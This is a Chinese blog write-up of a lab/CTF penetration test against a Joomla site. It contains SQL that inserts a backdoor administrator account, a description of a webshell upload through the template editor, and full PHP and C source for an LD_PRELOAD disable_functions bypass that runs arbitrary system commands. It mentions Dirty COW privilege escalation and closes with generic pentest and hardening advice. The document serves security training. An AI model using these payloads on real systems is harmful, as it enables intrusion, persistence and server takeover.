joomla渗透测试(脏牛提权)

本来是个域渗透,不过环境有问题,就当作web题在做了


解题过程

在这里插入图片描述这是一个joomla cms

  • 我们先扫一下目录
    在这里插入图片描述

  • 连接mysql
    得到MySQL的账号和密码
    在这里插入图片描述在这里插入图片描述然后创建新的管理员

     INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
    
    INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');
    

    这儿创建的管理员账号为admin2 secret
    不同的网站对应不同的前缀,改一下前缀即可

  • 登录后台,上传shell
    在这里插入图片描述在这里插入图片描述访问/templates/beez3//HyyMBb.php,即可getshell
    在这里插入图片描述

  • 绕过disable_function
    上传cmd.php

     <?php
    #move_uploaded_file($_FILES['evil']['tmp_name'], '/var/www/html/admin/shells/fEsiIOZ6Eup6pSW6/evil.so');
    putenv('LD_PRELOAD=/tmp/evil.so');
    putenv("_evilcmd=ls");
    mail('a','a','a');
    echo file_get_contents('/tmp/result.txt');
    ?>
    

    编译evil.c然后上传到/tmp目录下

    /* compile: gcc -Wall -fPIC -shared -o evil.so evil.c -ldl */
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    
    void payload(char *cmd) {
      char buf[512];
      strcpy(buf, cmd);
      strcat(buf, " > /tmp/result.txt");
      system(buf);}
    
    int getuid() {
      char *cmd;
      if (getenv("LD_PRELOAD") == NULL) { return 0; }
      unsetenv("LD_PRELOAD");
      if ((cmd = getenv("_evilcmd")) != NULL) {
        payload(cmd);
      }
      return 1;
    }
    

    在这里插入图片描述即可执行系统命令

  • 提权
    根据以下我们知道,这很明显是一个反向代理,实际的web服务不在192.168.1.110
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述找到一个账号密码,我们试一试能不能登录192.168.1.110
    在这里插入图片描述在这里插入图片描述直接使用脏牛提权
    在这里插入图片描述
    在这里插入图片描述在这里插入图片描述成功提权

Joomla是一个流行的内容管理系统(CMS),用于建立和管理网站。在进行渗透测试和加固时,以下是一些步骤和建议可以帮助保护基于Joomla的网站: 渗透测试: 1. 信息收集:了解目标网站的架构、版本和插件信息。可以使用工具如Wappalyzer、Joomscan等来获取这些信息。 2. 漏洞扫描:使用漏洞扫描工具如Nikto、OpenVAS等对网站进行扫描,检查是否存在已知的漏洞。 3. 基于Web的漏洞测试:进行常见的Web漏洞测试,如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)等。使用工具如Burp Suite、OWASP ZAP等进行测试。 4. 弱密码检测:通过使用弱密码字典或爆破工具对Joomla后台登录进行测试,以确保管理员账户和其他用户账户设置了足够强度的密码。 5. 文件上传漏洞:检查是否存在不受限制的文件上传功能,并尝试上传可执行文件或恶意脚本来验证是否存在文件上传漏洞。 加固措施: 1. 更新和升级:确保Joomla及其插件、模板和扩展程序保持最新版本,以消除已知漏洞并修复安全问题。 2. 强密码策略:要求管理员和用户设置强密码,并定期更改密码。使用密码管理工具来生成和保存密码。 3. 访问控制:限制对Joomla后台的访问,并只授予必要的权限给用户。使用强大的身份验证方式,如双因素认证。 4. 安全插件:安装和配置安全插件,如Joomla Security Scanner、RSFirewall等,以提供额外的安全保护和监控。 5. 文件权限设置:确保文件和目录的权限设置正确,以防止未经授权的访问和修改。 6. 数据库安全:使用强密码保护数据库,并限制数据库用户的权限,只给予必要的访问权限。 7. 定期备份:定期备份Joomla网站和相关数据,以便在发生安全事件时进行恢复。 这些是一些基本的渗透测试和加固措施,但请注意,安全是一个持续的过程。建议进行定期的安全审查和更新,以保持网站的安全性。同时,如果你不是专业的渗透测试人员,请务必在进行任何测试之前取得网站所有者的明确授权。希望这些信息对你有所帮助!如有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值